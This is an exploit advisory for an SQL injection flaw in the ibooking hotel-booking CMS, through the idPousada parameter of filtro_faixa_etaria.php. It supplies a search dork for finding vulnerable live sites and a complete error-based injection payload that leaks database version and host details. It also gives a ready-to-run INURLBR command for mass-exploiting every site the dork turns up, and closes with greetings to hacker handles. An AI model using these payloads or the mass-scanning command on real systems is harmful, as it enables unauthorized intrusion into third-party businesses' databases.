*# VENTOR: * www.ibooking.com.br *# Vulnerable versions:* ALL *# File: * filtro_faixa_etaria.php *# Parameter: * idPousada(GET) *# DORK: * intext:"Desenvolvido por ibooking" *# Reported:* 15/10/2015 # --------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # EMAIL: inurlbr@gmail.com # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # --------------------------------------------------------------------------------- *# Description* The vulnerable request is made through a javascript function found within /motor-de-reservas # Javascript code responsible for vulnerable request $.ajax({ type: "GET", url: "filtro_faixa_etaria.php", data: "qtde_quartos=1&idPousada=61", success: function(xml){ $("#filtro_faixa_etaria").html(xml); } }); *# URL Vulnerable:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61 *# POC:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION) *# Example:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) *# Return print:* http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png *# Mass exploration using scanner INURLBR* # Download: https://github.com/googleinurl/SCANNER-INURLBR *# COMMAND* *# SETTING DORK DE PESQUISA* --dork 'YOU_DORK' *# USE* --dork 'intext:"Desenvolvido por ibooking"' *# SETTING OUTPUT FILE:* *# USE* -s 'ibooking.txt' *# SETTING STRING EXPLOIT GET:* --exploit-get 'EXPLOIT_GET' *# USE* --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' *# SETTING TYPE OF VALIDATION: * *# USE* -t 3 The third type combine both first and second types: Then, of course, it also establishes connection with the exploit through the get method. The string get set in parameter --exploit-get It is injected directly in the url: Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php *# SETTING STRING OF VALIDATION:* Specify the string to be used as validation script: Exemplo: -a {string} Usando: -a 'hello world' If the specific value is found in the target, it is considered vulnerable. - USE: -a 'INURLBR_VULN' The INURLBR_VULN value is passed in hexadecimal format in the exploit-get string *# COMMAND FULL:* php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' *# MORE INFORMATION:* http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html +--------------------------------------------------------------------------------------+ | | | G R 3 3 T S | | | +--------------------------------------------------------------------------------------+ * r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x * Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer * dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z * Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira